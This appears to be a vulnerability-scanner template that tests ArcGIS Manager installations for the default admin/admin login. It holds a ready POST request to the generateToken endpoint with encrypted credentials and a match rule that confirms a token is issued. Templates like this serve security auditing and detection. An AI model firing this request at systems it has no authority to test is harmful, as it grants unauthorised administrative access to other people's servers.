id: arcgis-manager-default-password

info:
  name: ArcGis Manager Default Password
  author: zan8in
  severity: high
  verified: true
  description: ArcGIS manager default password  admin / admin
  tags: arcgis,admin,default-password

rules:
  r0:
    request:
      method: POST
      path: /arcgis/admin/generateToken
      body: |
        request=826841e7ba750ea698adb7ca058691a923b5530e08e2f9b81568b2ea858b8c2e8f14c632d6caae2a73cc113feed85069c4d7dcbaa9281c014304c8a7a55728dc&username=1d0bb95c735e50a26ef38ff8b5f7037b37cb59ef4058f2da9c0f449528225bacdf9186d8565862c962878c34d8afd87a3a99d5a095d540289a0b3d5d5c562620&password=6e8253afa39de6dadee3343b6e84005998b3f7421d5f519143945ef6a1f29d46c35f3fe7aa322a365f22a3cbb588412f2932a5a1a211b7373a3c987e990d17f3&expiration=4f69339bbeff68147fedbc07fa01a333c9a80556e4353e064c2672e30b1d0ba510a617463a28eb359390722d812e2143b6dc4e8cad6d3cd28e308f90539c6b76&referer=39ab8670c8f7b5fa4db0b81d8ae8444c8b856b2bc5ffddf982896e916f01f99ad3195c3dd81580565b67c27b788435d9fddd2d737c24fdcaa54f70b747fd06fe&client=08a2db040b42ede7b6f422bfaef67d207e4c6cb721c54baf32bd4cee6c3dd55511d7c3245190db4be648813b3f7fcea0ed976efe7e02ddb2ea11d4e5d4dc65a7&f=json&encrypted=true
    expression: response.status == 200 && response.body.bcontains(b'"token":') && response.body.bcontains(b'"expires":')
expression: r0()